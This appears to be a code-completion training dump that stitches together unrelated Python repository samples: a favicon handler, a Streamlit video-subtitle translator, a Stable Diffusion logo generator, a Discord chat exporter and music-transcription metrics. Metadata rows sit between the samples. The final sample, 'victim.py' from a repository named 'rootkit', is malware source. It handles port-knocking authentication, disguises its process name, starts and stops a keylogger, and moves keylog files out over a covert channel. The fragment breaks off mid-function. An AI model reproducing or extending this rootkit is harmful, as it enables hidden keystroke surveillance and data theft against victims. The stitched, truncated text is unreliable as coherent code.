async def handle_favicon(status: dict, messages: list[str | Picture]) -> None:
if favicon := status.get("favicon"):
byte_data = base64.b64decode(f"{favicon[22:-1]}=")
img = Image.open(BytesIO(byte_data)).convert("RGB")
image = BytesIO()
img.save(image, format="JPEG", quality=90)
| messages.append(await SelfPicture().from_data(image, "jpeg"))
| 0 | 2023-12-16 13:19:56+00:00 | 2k |
Chenyme/Chenyme-AAMT | AAMT.py | [
{
"identifier": "generate_srt_from_result",
"path": "utils/utils.py",
"snippet": "def generate_srt_from_result(result): # 格式化为SRT字幕的形式\r\n segments = result['segments']\r\n srt_content = ''\r\n segment_id = 1\r\n for segment in segments:\r\n start_time = int(segment['start'] * 1000)\r\n end_time = int(segment['end'] * 1000)\r\n text = segment['text']\r\n\r\n srt_content += f\"{segment_id}\\n\"\r\n srt_content += f\"{milliseconds_to_srt_time_format(start_time)} --> {milliseconds_to_srt_time_format(end_time)}\\n\"\r\n srt_content += f\"{text}\\n\\n\"\r\n segment_id += 1\r\n\r\n return srt_content\r"
},
{
"identifier": "tmp_filepath",
"path": "utils/utils.py",
"snippet": "def tmp_filepath(uploaded_file): # 虚拟化文件路径\r\n with tempfile.NamedTemporaryFile(delete=False) as tmp_file:\r\n tmp_file.write(uploaded_file.getvalue())\r\n return tmp_file.name\r"
},
{
"identifier": "openai_translate",
"path": "utils/utils.py",
"snippet": "def openai_translate(key, base, result):\r\n llm = ChatOpenAI(openai_api_key=key, openai_api_base=base)\r\n # Prompt\r\n prompt = ChatPromptTemplate(\r\n messages=[\r\n SystemMessagePromptTemplate.from_template(\r\n \"You are a senior translator proficient in Chinese and English. Your task is to translate whatever the user says. You only need to answer the translation result and do not use punctuation marks other than question marks. Please strictly implement it!\"\r\n ),\r\n # The `variable_name` here is what must align with memory\r\n MessagesPlaceholder(variable_name=\"chat_history\"),\r\n HumanMessagePromptTemplate.from_template(\"{question}\"),\r\n ]\r\n )\r\n # 设置记忆参数\r\n memory = ConversationBufferWindowMemory(memory_key=\"chat_history\", return_messages=True, k=5)\r\n conversation = LLMChain(llm=llm, prompt=prompt, verbose=False, memory=memory)\r\n segments = result['segments']\r\n segment_id = 0\r\n for segment in segments:\r\n text = segment['text']\r\n response = conversation({\"question\": text})\r\n result['segments'][segment_id]['text'] = response['text']\r\n segment_id += 1\r\n return result\r"
},
{
"identifier": "srt_mv",
"path": "utils/utils.py",
"snippet": "def srt_mv(cache_dir):\r\n command = ' ffmpeg -i \"' + \"uploaded.mp4\" + '\" -lavfi ' + '\"subtitles=' + 'output.srt' + ':force_style=' + \"'BorderStyle=0,Outline=1,Shadow=0,Fontsize=18'\" + '\"' + ' -y -crf 1 -c:a copy \"' + \"output.mp4\" + '\"'\r\n subprocess.run(command, shell=True, cwd=cache_dir)\r"
},
{
"identifier": "cache",
"path": "utils/utils.py",
"snippet": "def cache(cache_dir):\r\n total_size = 0 # 总大小,初始为0\r\n for root, dirs, files in os.walk(cache_dir): # 遍历文件夹中的所有文件和子文件夹\r\n for file_name in files:\r\n file_path = os.path.join(root, file_name)\r\n total_size += os.path.getsize(file_path)\r\n return total_size\r"
},
{
"identifier": "convert_size",
"path": "utils/utils.py",
"snippet": "def convert_size(size):\r\n if size == 0:\r\n return \"0B\"\r\n size_names = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\r\n i = int(math.floor(math.log(size, 1024)))\r\n power = math.pow(1024, i)\r\n size = round(size / power, 2)\r\n return f\"{size} {size_names[i]}\"\r"
}
] | import os
import json
import streamlit as st
import whisper
from utils.utils import generate_srt_from_result, tmp_filepath, openai_translate, srt_mv, cache, convert_size
| 1,557 | # 作者:chenyme
# 版本:v0.2.2
# 博客站:待更新
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # 设置布局样式为宽展示
initial_sidebar_state="expanded" # 设置初始边栏状态为展开
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # 读取配置
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# 文件上传逻辑
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# whisper识别
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
| # 作者:chenyme
# 版本:v0.2.2
# 博客站:待更新
st.set_page_config(
page_title="AAMT v0.2.2",
page_icon="📊",
layout="wide", # 设置布局样式为宽展示
initial_sidebar_state="expanded" # 设置初始边栏状态为展开
)
st.title("Chenyme-AAMT")
st.write("##### AI全自动视频翻译")
with st.sidebar:
st.title("欢迎!")
st.write('''
### 尊敬的用户,恭喜你完成了该项目的安装!
欢迎您使用AAMT V0.2.2!本项目的目标是为您提供一个简单易用的全自动视频翻译工具,以便您能够快速地将翻译后的字幕与原视频合并,从而更轻松地享受翻译后的内容。
请注意以下事项:
1. 请确保您的系统已正确安装Python,并且版本号为3.8或更高。
2. 请确保已经安装了所有依赖库,并设置了ffmpeg为环境变量。
3. 如果在安装或运行过程中遇到任何问题,请查阅项目文档或联系开发人员以获取帮助。
''')
dir_1 = os.path.dirname(os.path.abspath(__file__))
dir_2 = dir_1.replace("\\", "/")
config_dir = dir_2 + "/config/"
cache_dir = dir_2 + "/cache/"
print("当前项目的配置文件:", config_dir)
print("当前项目的缓存位置:", cache_dir)
with open(config_dir + "config.json", 'r') as file: # 读取配置
config = json.load(file)
tab1, tab2, tab3 = st.tabs(["主页", "设置", "关于"])
with tab1:
# 文件上传逻辑
uploaded_file = st.file_uploader("请在这里上传视频:", type=['mp4', 'mov'])
if uploaded_file is not None:
with open(cache_dir + "uploaded.mp4", "wb") as file:
file.write(uploaded_file.getbuffer())
st.success("上传成功")
if st.button('运行程序'):
if uploaded_file is not None:
with st.spinner('Wait for it...'):
# whisper识别
model = whisper.load_model(st.session_state.option)
pathvideo = tmp_filepath(uploaded_file)
result = model.transcribe(pathvideo)
print("whisper识别:" + result['text']) # whisper源语言识别内容
| result = openai_translate(st.session_state.key, st.session_state.base, result) # 翻译成目标语言
| 2 | 2023-12-18 04:06:03+00:00 | 2k |
davidrs/logo-buddy | logo_buddy/main.py | [
{
"identifier": "preprocess",
"path": "logo_buddy/controlnet.py",
"snippet": "def preprocess(image, controlnet_path=None):\n if \"canny\" in controlnet_path:\n return canny_preprocess(image)\n else:\n return Image.fromarray(image)"
},
{
"identifier": "CN_MODELS",
"path": "logo_buddy/controlnet.py",
"snippet": "CN_MODELS = {\n \"qr\": \"/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/controlnetQRPatternQR_v2Sd15.safetensors\",\n \"canny\": \"/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_canny-fp16.safetensors\",\n \"depth\": \"/Users/drustsmith/repos/stable-diffusion-webui/models/ControlNet/control_depth-fp16.safetensors\",\n}"
},
{
"identifier": "read_fit",
"path": "logo_buddy/utils.py",
"snippet": "def read_fit(img_path, max_width=768):\n image = cv2.imread(img_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # resize image to X width, keep ratio\n h, w, _ = image.shape\n new_w = max_width\n new_h = int(h * (new_w / w))\n image = cv2.resize(image, (new_w, new_h))\n return image"
}
] | import os
import os.path as op
import numpy as np
import torch
import cv2
import torch
from glob import glob
from diffusers import StableDiffusionPipeline, DiffusionPipeline
from diffusers import (
StableDiffusionControlNetPipeline,
ControlNetModel,
UniPCMultistepScheduler,
)
from diffusers.utils import load_image
from PIL import Image
from .controlnet import preprocess, CN_MODELS
from .utils import read_fit | 1,465 |
STEPS = 34
SEED = 12
MODELS = {
"real": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/realisticVisionV51_v51VAE.safetensors",
"anim": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/revAnimated_v122EOL.safetensors",
}
#
PROMPT_LIST = [
# Winter
{"text": "santa playing in the snow, ethereal, dreamy, highly detailed, realistic lighting, sharp focus, rule of thirds, artgerm, wlop, arney freytag, hd, octane, 4 k, ", "file_name": "winter_santa", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "ethereal fantasy concept art of dreamscape Winter wonderland, surreal, ethereal, dreamy, mysterious, fantasy, highly detailed, magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy",
"file_name": "winter_wonderland",
"model": "anim",
},
{"text": "((ginger bread house)), realistic, insanely detailed, octane rendered, unreal engine, illustration, trending on artstation, masterpiece, photography", "file_name": "winter_ginger", "model":"real"},
{"text": "winter ice sculpture ", "file_name": "winter_ice"},
# General
{"text": "a neon glowing sign", "file_name": "neon"},
{"text": "hot air balloons ", "file_name": "hot_air_balloons", "model":"real"},
{"text": "(wood carving), (inlay), (etsy) ", "file_name": "wood_carving", "model":"real"},
{
"text": "paper cut, paper layers, laser cut, paper art, vibrant colors, ",
"file_name": "paper_art",
"model": "real",
},
# {"text": "carved halloween pumpkin, witches, spooky, fun, (vibrant colors:1.1), ", "file_name": "haloween", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "fun textures and colours , logo, pixar, orange and pink clouds blue sky, sun, happy vibes, subtle lense flare, birds ",
"file_name": "clouds",
"model": "anim",
},
]
DEFAULT_POSITIVE_SUFFIX = (
",detailed, intricate, best quality, (highest quality, award winning:1.3)"
)
DEFAULT_NEGATIVE_PROMPT = (
"blurry, low quality, low resolution, low res, low resolution, watermark, logo"
)
OUT_DIR = "./out"
os.makedirs(OUT_DIR, exist_ok=True)
# env is mac, cpu or gpu
DEVICE = "mps"
if torch.cuda.is_available():
DEVICE = "gpu"
def get_pipe(model_path, controlnet_path=None):
controlnet_model = None
if controlnet_path:
# load control net and stable diffusion v1-5
controlnet_model = ControlNetModel.from_single_file(
controlnet_path,
torch_dtype=torch.float16,
use_safetensors=True,
device=DEVICE,
)
pipe = StableDiffusionControlNetPipeline.from_single_file(
model_path,
use_safetensors=True,
torch_dtype=torch.float16,
controlnet=controlnet_model,
)
pipe = pipe.to(DEVICE)
# Recommended if your computer has < 64 GB of RAM
pipe.enable_attention_slicing()
return pipe
def controlnet_generate(img_path, pipe, out_dir, prompts=PROMPT_LIST, controlnet=None):
image = read_fit(img_path)
preprocessed_image = None
if controlnet:
preprocessed_image = preprocess(image, controlnet_path=controlnet)
for p in prompts:
generator = torch.manual_seed(SEED)
for i in range(0, 1):
print(DEFAULT_POSITIVE_SUFFIX)
print(p["text"])
steps = STEPS
image = pipe(
p["text"] + DEFAULT_POSITIVE_SUFFIX,
negative_prompt=DEFAULT_NEGATIVE_PROMPT,
num_inference_steps=steps,
generator=generator,
image=preprocessed_image,
# guidance_scale=20 if 'qr' in controlnet else 15,
# controlnet_conditioning_scale=2.0 if 'qr' in controlnet else 1.0,
# strength=0.85,
).images[0]
image.save(op.join(out_dir, f"{p['file_name']}_{controlnet}_{SEED}.png"))
# if main
if __name__ == "__main__":
for m, mp in MODELS.items():
|
STEPS = 34
SEED = 12
MODELS = {
"real": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/realisticVisionV51_v51VAE.safetensors",
"anim": "/Users/drustsmith/repos/stable-diffusion-webui/models/Stable-diffusion/revAnimated_v122EOL.safetensors",
}
#
PROMPT_LIST = [
# Winter
{"text": "santa playing in the snow, ethereal, dreamy, highly detailed, realistic lighting, sharp focus, rule of thirds, artgerm, wlop, arney freytag, hd, octane, 4 k, ", "file_name": "winter_santa", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "ethereal fantasy concept art of dreamscape Winter wonderland, surreal, ethereal, dreamy, mysterious, fantasy, highly detailed, magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy",
"file_name": "winter_wonderland",
"model": "anim",
},
{"text": "((ginger bread house)), realistic, insanely detailed, octane rendered, unreal engine, illustration, trending on artstation, masterpiece, photography", "file_name": "winter_ginger", "model":"real"},
{"text": "winter ice sculpture ", "file_name": "winter_ice"},
# General
{"text": "a neon glowing sign", "file_name": "neon"},
{"text": "hot air balloons ", "file_name": "hot_air_balloons", "model":"real"},
{"text": "(wood carving), (inlay), (etsy) ", "file_name": "wood_carving", "model":"real"},
{
"text": "paper cut, paper layers, laser cut, paper art, vibrant colors, ",
"file_name": "paper_art",
"model": "real",
},
# {"text": "carved halloween pumpkin, witches, spooky, fun, (vibrant colors:1.1), ", "file_name": "haloween", "model":"anim"}, # <lora:fantasy00d:0.5>, animated
{
"text": "fun textures and colours , logo, pixar, orange and pink clouds blue sky, sun, happy vibes, subtle lense flare, birds ",
"file_name": "clouds",
"model": "anim",
},
]
DEFAULT_POSITIVE_SUFFIX = (
",detailed, intricate, best quality, (highest quality, award winning:1.3)"
)
DEFAULT_NEGATIVE_PROMPT = (
"blurry, low quality, low resolution, low res, low resolution, watermark, logo"
)
OUT_DIR = "./out"
os.makedirs(OUT_DIR, exist_ok=True)
# env is mac, cpu or gpu
DEVICE = "mps"
if torch.cuda.is_available():
DEVICE = "gpu"
def get_pipe(model_path, controlnet_path=None):
controlnet_model = None
if controlnet_path:
# load control net and stable diffusion v1-5
controlnet_model = ControlNetModel.from_single_file(
controlnet_path,
torch_dtype=torch.float16,
use_safetensors=True,
device=DEVICE,
)
pipe = StableDiffusionControlNetPipeline.from_single_file(
model_path,
use_safetensors=True,
torch_dtype=torch.float16,
controlnet=controlnet_model,
)
pipe = pipe.to(DEVICE)
# Recommended if your computer has < 64 GB of RAM
pipe.enable_attention_slicing()
return pipe
def controlnet_generate(img_path, pipe, out_dir, prompts=PROMPT_LIST, controlnet=None):
image = read_fit(img_path)
preprocessed_image = None
if controlnet:
preprocessed_image = preprocess(image, controlnet_path=controlnet)
for p in prompts:
generator = torch.manual_seed(SEED)
for i in range(0, 1):
print(DEFAULT_POSITIVE_SUFFIX)
print(p["text"])
steps = STEPS
image = pipe(
p["text"] + DEFAULT_POSITIVE_SUFFIX,
negative_prompt=DEFAULT_NEGATIVE_PROMPT,
num_inference_steps=steps,
generator=generator,
image=preprocessed_image,
# guidance_scale=20 if 'qr' in controlnet else 15,
# controlnet_conditioning_scale=2.0 if 'qr' in controlnet else 1.0,
# strength=0.85,
).images[0]
image.save(op.join(out_dir, f"{p['file_name']}_{controlnet}_{SEED}.png"))
# if main
if __name__ == "__main__":
for m, mp in MODELS.items(): | for cn, cn_path in CN_MODELS.items(): | 1 | 2023-12-17 19:24:56+00:00 | 2k |
Varexa/Gateway | chat_exporter/construct/assets/embed.py | [
{
"identifier": "discord",
"path": "chat_exporter/ext/discord_import.py",
"snippet": ""
},
{
"identifier": "fill_out",
"path": "chat_exporter/ext/html_generator.py",
"snippet": "PARSE_MODE_NONE = 0\r\nPARSE_MODE_NO_MARKDOWN = 1\r\nPARSE_MODE_MARKDOWN = 2\r\nPARSE_MODE_EMBED = 3\r\nPARSE_MODE_SPECIAL_EMBED = 4\r\nPARSE_MODE_REFERENCE = 5\r\nPARSE_MODE_EMOJI = 6\r\nasync def fill_out(guild, base, replacements):\r\ndef read_file(filename):\r"
}
] | import html
from chat_exporter.ext.discord_import import discord
from chat_exporter.ext.html_generator import (
fill_out,
embed_body,
embed_title,
embed_description,
embed_field,
embed_field_inline,
embed_footer,
embed_footer_icon,
embed_image,
embed_thumbnail,
embed_author,
embed_author_icon,
PARSE_MODE_NONE,
PARSE_MODE_EMBED,
PARSE_MODE_MARKDOWN,
PARSE_MODE_SPECIAL_EMBED,
)
| 894 |
modules_which_use_none = ["nextcord", "disnake"]
def _gather_checker():
if discord.module not in modules_which_use_none and hasattr(discord.Embed, "Empty"):
return discord.Embed.Empty
return None
class Embed:
r: str
g: str
b: str
title: str
description: str
author: str
image: str
thumbnail: str
footer: str
fields: str
check_against = None
def __init__(self, embed, guild):
self.embed: discord.Embed = embed
self.guild: discord.Guild = guild
async def flow(self):
self.check_against = _gather_checker()
self.build_colour()
await self.build_title()
await self.build_description()
await self.build_fields()
await self.build_author()
await self.build_image()
await self.build_thumbnail()
await self.build_footer()
await self.build_embed()
return self.embed
def build_colour(self):
self.r, self.g, self.b = (
(self.embed.colour.r, self.embed.colour.g, self.embed.colour.b)
if self.embed.colour != self.check_against else (0x20, 0x22, 0x25) # default colour
)
async def build_title(self):
self.title = html.escape(self.embed.title) if self.embed.title != self.check_against else ""
if self.title:
self.title = await fill_out(self.guild, embed_title, [
("EMBED_TITLE", self.title, PARSE_MODE_MARKDOWN)
])
async def build_description(self):
self.description = html.escape(self.embed.description) if self.embed.description != self.check_against else ""
if self.description:
self.description = await fill_out(self.guild, embed_description, [
("EMBED_DESC", self.embed.description, PARSE_MODE_EMBED)
])
async def build_fields(self):
self.fields = ""
# This does not have to be here, but Pycord.
if not self.embed.fields:
return
for field in self.embed.fields:
field.name = html.escape(field.name)
field.value = html.escape(field.value)
if field.inline:
self.fields += await fill_out(self.guild, embed_field_inline, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)
])
else:
self.fields += await fill_out(self.guild, embed_field, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)])
async def build_author(self):
self.author = html.escape(self.embed.author.name) if self.embed.author.name != self.check_against else ""
self.author = f'<a class="chatlog__embed-author-name-link" href="{self.embed.author.url}">{self.author}</a>' \
if self.embed.author.url != self.check_against \
else self.author
|
modules_which_use_none = ["nextcord", "disnake"]
def _gather_checker():
if discord.module not in modules_which_use_none and hasattr(discord.Embed, "Empty"):
return discord.Embed.Empty
return None
class Embed:
r: str
g: str
b: str
title: str
description: str
author: str
image: str
thumbnail: str
footer: str
fields: str
check_against = None
def __init__(self, embed, guild):
self.embed: discord.Embed = embed
self.guild: discord.Guild = guild
async def flow(self):
self.check_against = _gather_checker()
self.build_colour()
await self.build_title()
await self.build_description()
await self.build_fields()
await self.build_author()
await self.build_image()
await self.build_thumbnail()
await self.build_footer()
await self.build_embed()
return self.embed
def build_colour(self):
self.r, self.g, self.b = (
(self.embed.colour.r, self.embed.colour.g, self.embed.colour.b)
if self.embed.colour != self.check_against else (0x20, 0x22, 0x25) # default colour
)
async def build_title(self):
self.title = html.escape(self.embed.title) if self.embed.title != self.check_against else ""
if self.title:
self.title = await fill_out(self.guild, embed_title, [
("EMBED_TITLE", self.title, PARSE_MODE_MARKDOWN)
])
async def build_description(self):
self.description = html.escape(self.embed.description) if self.embed.description != self.check_against else ""
if self.description:
self.description = await fill_out(self.guild, embed_description, [
("EMBED_DESC", self.embed.description, PARSE_MODE_EMBED)
])
async def build_fields(self):
self.fields = ""
# This does not have to be here, but Pycord.
if not self.embed.fields:
return
for field in self.embed.fields:
field.name = html.escape(field.name)
field.value = html.escape(field.value)
if field.inline:
self.fields += await fill_out(self.guild, embed_field_inline, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)
])
else:
self.fields += await fill_out(self.guild, embed_field, [
("FIELD_NAME", field.name, PARSE_MODE_SPECIAL_EMBED),
("FIELD_VALUE", field.value, PARSE_MODE_EMBED)])
async def build_author(self):
self.author = html.escape(self.embed.author.name) if self.embed.author.name != self.check_against else ""
self.author = f'<a class="chatlog__embed-author-name-link" href="{self.embed.author.url}">{self.author}</a>' \
if self.embed.author.url != self.check_against \
else self.author
| author_icon = await fill_out(self.guild, embed_author_icon, [
| 1 | 2023-12-18 14:17:31+00:00 | 2k |
mariaalfaroc/a2s-transformer | my_utils/metrics.py | [
{
"identifier": "VOICE_CHANGE_TOKEN",
"path": "my_utils/encoding_convertions.py",
"snippet": "VOICE_CHANGE_TOKEN = \"<COC>\""
},
{
"identifier": "STEP_CHANGE_TOKEN",
"path": "my_utils/encoding_convertions.py",
"snippet": "STEP_CHANGE_TOKEN = \"<COR>\""
}
] | import os
import shutil
from music21 import converter as converterm21
from pyMV2H.utils.mv2h import MV2H
from pyMV2H.metrics.mv2h import mv2h
from pyMV2H.utils.music import Music
from pyMV2H.converter.midi_converter import MidiConverter as Converter
from .encoding_convertions import VOICE_CHANGE_TOKEN, STEP_CHANGE_TOKEN | 927 |
def compute_metrics(y_true, y_pred):
################################# Sym-ER and Seq-ER:
metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred)
################################# MV2H:
mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred)
metrics.update(mv2h_dict)
return metrics
#################################################################### SYM-ER AND SEQ-ER:
def compute_ed_metrics(y_true, y_pred):
def levenshtein(a, b):
n, m = len(a), len(b)
if n > m:
a, b = b, a
n, m = m, n
current = range(n + 1)
for i in range(1, m + 1):
previous, current = current, [i] + [0] * n
for j in range(1, n + 1):
add, delete = previous[j] + 1, current[j - 1] + 1
change = previous[j - 1]
if a[j - 1] != b[i - 1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
ed_acc = 0
length_acc = 0
label_acc = 0
for t, h in zip(y_true, y_pred):
ed = levenshtein(t, h)
ed_acc += ed
length_acc += len(t)
if ed > 0:
label_acc += 1
return {
"sym-er": 100.0 * ed_acc / length_acc,
"seq-er": 100.0 * label_acc / len(y_pred),
}
#################################################################### MV2H:
def compute_mv2h_metrics(y_true, y_pred):
def krn2midi(in_file):
a = converterm21.parse(in_file).write("midi")
midi_file = a.name
shutil.copyfile(a, midi_file)
os.remove(in_file)
return midi_file
def midi2txt(midi_file):
txt_file = midi_file.replace("mid", "txt")
converter = Converter(file=midi_file, output=txt_file)
converter.convert_file()
with open(txt_file, "r") as fin:
f = [u.replace(".0", "") for u in fin.readlines()]
with open(txt_file, "w") as fout:
for u in f:
fout.write(u)
os.remove(midi_file)
return txt_file
########################################### Polyphonic evaluation:
def eval_as_polyphonic():
# Convert to MIDI
reference_midi_file = krn2midi("true.krn")
predicted_midi_file = krn2midi("pred.krn")
# Convert to TXT
reference_txt_file = midi2txt(reference_midi_file)
predicted_txt_file = midi2txt(predicted_midi_file)
# Compute MV2H
reference_file = Music.from_file(reference_txt_file)
transcription_file = Music.from_file(predicted_txt_file)
res_dict = MV2H(multi_pitch=0, voice=0, meter=0, harmony=0, note_value=0)
try:
res_dict = mv2h(reference_file, transcription_file)
except:
pass
# Remove auxiliar files
os.remove(reference_txt_file)
os.remove(predicted_txt_file)
return res_dict
########################################### Monophonic evaluation:
def get_number_of_voices(kern):
num_voices = 0
for token in kern:
if token == VOICE_CHANGE_TOKEN:
continue
|
def compute_metrics(y_true, y_pred):
################################# Sym-ER and Seq-ER:
metrics = compute_ed_metrics(y_true=y_true, y_pred=y_pred)
################################# MV2H:
mv2h_dict = compute_mv2h_metrics(y_true=y_true, y_pred=y_pred)
metrics.update(mv2h_dict)
return metrics
#################################################################### SYM-ER AND SEQ-ER:
def compute_ed_metrics(y_true, y_pred):
def levenshtein(a, b):
n, m = len(a), len(b)
if n > m:
a, b = b, a
n, m = m, n
current = range(n + 1)
for i in range(1, m + 1):
previous, current = current, [i] + [0] * n
for j in range(1, n + 1):
add, delete = previous[j] + 1, current[j - 1] + 1
change = previous[j - 1]
if a[j - 1] != b[i - 1]:
change = change + 1
current[j] = min(add, delete, change)
return current[n]
ed_acc = 0
length_acc = 0
label_acc = 0
for t, h in zip(y_true, y_pred):
ed = levenshtein(t, h)
ed_acc += ed
length_acc += len(t)
if ed > 0:
label_acc += 1
return {
"sym-er": 100.0 * ed_acc / length_acc,
"seq-er": 100.0 * label_acc / len(y_pred),
}
#################################################################### MV2H:
def compute_mv2h_metrics(y_true, y_pred):
def krn2midi(in_file):
a = converterm21.parse(in_file).write("midi")
midi_file = a.name
shutil.copyfile(a, midi_file)
os.remove(in_file)
return midi_file
def midi2txt(midi_file):
txt_file = midi_file.replace("mid", "txt")
converter = Converter(file=midi_file, output=txt_file)
converter.convert_file()
with open(txt_file, "r") as fin:
f = [u.replace(".0", "") for u in fin.readlines()]
with open(txt_file, "w") as fout:
for u in f:
fout.write(u)
os.remove(midi_file)
return txt_file
########################################### Polyphonic evaluation:
def eval_as_polyphonic():
# Convert to MIDI
reference_midi_file = krn2midi("true.krn")
predicted_midi_file = krn2midi("pred.krn")
# Convert to TXT
reference_txt_file = midi2txt(reference_midi_file)
predicted_txt_file = midi2txt(predicted_midi_file)
# Compute MV2H
reference_file = Music.from_file(reference_txt_file)
transcription_file = Music.from_file(predicted_txt_file)
res_dict = MV2H(multi_pitch=0, voice=0, meter=0, harmony=0, note_value=0)
try:
res_dict = mv2h(reference_file, transcription_file)
except:
pass
# Remove auxiliar files
os.remove(reference_txt_file)
os.remove(predicted_txt_file)
return res_dict
########################################### Monophonic evaluation:
def get_number_of_voices(kern):
num_voices = 0
for token in kern:
if token == VOICE_CHANGE_TOKEN:
continue | if token == STEP_CHANGE_TOKEN: | 1 | 2023-12-18 20:01:00+00:00 | 2k |
YashsviG/rootkit | victim.py | [
{
"identifier": "port_knocking",
"path": "portknocker.py",
"snippet": "def port_knocking(victim_ip):\n \"\"\"\n Perform port knocking on the victim side to authenticate the commander.\n\n Args:\n victim_ip (str): IP address of the victim.\n\n Returns:\n tuple: IP address and port number if successful, None otherwise.\n \"\"\"\n potential_commanders = {}\n while True:\n packet = sniff(filter=f\"tcp and dst {victim_ip}\", count=1)[0]\n\n if TCP in packet and IP in packet:\n src_ip = packet[IP].src\n src_port = packet[TCP].dport\n\n if src_port in knock_ports:\n current_time = time.time()\n\n if src_ip not in potential_commanders:\n potential_commanders[src_ip] = []\n\n potential_commanders[src_ip].append((src_port, current_time))\n\n # Check if all knock ports have been hit within the timeout period\n print(potential_commanders)\n if len(potential_commanders[src_ip]) >= len(knock_ports):\n # Check for valid timestamps\n valid_timestamps = True\n for i, (port, timestamp) in enumerate(potential_commanders[src_ip]):\n if i == 0:\n continue\n\n previous_timestamp = potential_commanders[src_ip][i - 1][1]\n if abs(timestamp - previous_timestamp) > timeout:\n valid_timestamps = False\n potential_commanders.pop(src_ip)\n\n if valid_timestamps:\n # Successful port knocking sequence\n return src_ip, 7000\n\n # Wait for the next packet\n time.sleep(0.1)"
},
{
"identifier": "choose_process_name",
"path": "processname.py",
"snippet": "def choose_process_name():\n \"\"\"\n Choose a process name based on existing process names.\n\n Returns:\n str: Chosen process name.\n \"\"\"\n # Get a list of all existing process names\n existing_process_names = [p.name() for p in psutil.process_iter()]\n\n if existing_process_names:\n chosen_name = analyze_existing_process_names()\n else:\n chosen_name = \"nvme-update-wq\"\n\n print(f\"Process name chosen {chosen_name}\")\n return chosen_name"
},
{
"identifier": "get_ip_address",
"path": "utils.py",
"snippet": "def get_ip_address():\n \"\"\"\n Get the local IP address of the machine.\n\n Returns:\n str: Local IP address.\n \"\"\"\n with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:\n s.connect((\"8.8.8.8\", 80))\n name = s.getsockname()[0]\n return name"
},
{
"identifier": "transfer_keylog_file",
"path": "utils.py",
"snippet": "def transfer_keylog_file(keylogger, covert, file_path):\n \"\"\"\n Transfer the keylog file.\n\n Args:\n keylogger (Keylogger): Keylogger instance.\n covert (CovertChannel): Covert channel instance.\n file_path (str): Path of the keylog file.\n\n Returns:\n int: Status code (3 if unsuccessful).\n \"\"\"\n if keylogger.get_status():\n print(\"VICTIM:: Cannot transfer, Keylogger running\")\n return 3\n \n if not os.path.exists(file_path):\n print(\"VICTIM:: keylog.txt does not exist\")\n return 3\n \n covert.cmd = 0\n covert.send_data(for_victim=False)\n covert.cmd = None\n covert.file_name = file_path\n covert.send_data(for_victim=False, event=\"IN_CREATE\")\n covert.file_name = None\n os.remove(file_path)"
},
{
"identifier": "check_exists",
"path": "utils.py",
"snippet": "def check_exists(path):\n \"\"\"\n Check if a file or directory exists.\n\n Args:\n path (str): Path to check.\n\n Returns:\n bool: True if exists, False otherwise.\n \"\"\"\n if os.path.exists(path):\n return True\n return False"
}
] | import argparse
import setproctitle
import shutil
from keylogger import *
from watcher import *
from portknocker import port_knocking
from processname import choose_process_name
from utils import get_ip_address, transfer_keylog_file, check_exists
| 1,279 |
def handle_command(command: int, keylogger, watcher, covert):
"""
Handle the received command.
Args:
command (int): Received command.
keylogger (Keylogger): Keylogger instance.
watcher (Watcher): Watcher instance.
covert (CovertChannel): Covert channel instance.
Returns:
int: Result code.
"""
if command == 0:
return 0
print(f"VICTIM:: Command Received", end=" ")
if command == 1:
print("VICTIM:: Received command to start the keylog program...")
keylogger.start_keylogger()
return 1
elif command == 2:
print("VICTIM:: Received command to stop the keylog program...")
if not keylogger.get_status():
print("VICTIM:: Keylogger is not running.")
return 2
val = keylogger.stop_keylogger()
if val == 0:
print("VICTIM:: Keylogger has been stopped.")
